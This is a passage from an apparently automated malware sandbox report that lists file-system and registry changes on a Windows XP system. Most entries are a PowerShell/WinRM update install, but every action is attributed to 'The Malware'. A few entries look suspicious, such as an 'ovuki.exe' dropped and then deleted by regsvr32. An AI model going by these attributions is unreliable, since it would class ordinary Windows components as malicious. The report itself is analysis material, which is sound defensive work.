%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)

The process mscorsvw.exe:3456 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)

The process mscorsvw.exe:3532 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (70080 bytes)

The process mscorsvw.exe:2700 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)

The process mscorsvw.exe:3136 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:3816 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)

The process mscorsvw.exe:1112 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)

The process mscorsvw.exe:2940 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)

The Malware deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)

The process PSCustomSetupUtil.exe:3868 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\SADGJMPS\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:2844 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\WEHLORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:2924 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\FY147ADG\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:3140 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\HZ369CFI\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3004 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CUX036AD\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:3060 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\J369CFIL\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3308 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CUX0369C\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3164 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\7PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3232 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\O7BEHKNQ\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:3028 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\2LORUX03\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3104 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\I0369CGJ\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3256 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\9RUX0369\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process PSCustomSetupUtil.exe:3892 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\4NQTWZ36\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:3844 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GZ258C0P\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2872 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\RADGJMPS\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:3936 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ZILORUX0\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3984 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\2LOSVY14\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2972 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CVY147AD\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:3284 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\BTWZ258B\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:2896 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\4NQTW036\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:3192 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ZHKNQUX0\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:3960 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\P8BEHKNR\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2792 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\HZ258BEH\System.Management.Automation.dll (81046 bytes)

The process PSSetupNativeUtils.exe:2068 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process regsvr32.exe:436 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\uk-ua[1].htm (29849 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe (259 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\uk-ua[1].htm (0 bytes)
C:\%original file name%.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe (0 bytes)

The process regsvr32.exe:780 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)

Registry activity

The process mofcomp.exe:2768 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 DE A3 1C FE 42 81 94 59 54 82 8D C5 37 EC 4A"

The process WindowsXP-KB968930-x86-ENG.exe:804 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 8C 69 EE 1A 40 1C BC 83 44 BC 1A 9D 50 1C 3F"

The process ngen.exe:4084 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 7E A4 AA CF 9E 33 28 26 36 D7 87 51 9F 8A 2B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process ngen.exe:3616 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 1E D7 40 E1 27 15 3D 49 2A 91 7B 2E 39 3D 8E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

The process ngen.exe:3712 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 8D 70 CD 24 D9 87 33 3F 20 88 9F 76 C1 FD DB"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3636 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 DF 77 DE CE C1 E3 3C B5 F4 69 FE 21 E3 C9 A1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3672 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 C6 25 79 87 F7 2A C4 4C E7 B8 46 50 57 3C B6"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:252 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 DE D4 0A 14 3D EF 73 4D 63 5D 9A 83 E7 3C 26"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3652 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 81 B6 07 CE 82 E6 42 00 0A 5B 8D 1D 22 82 E3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

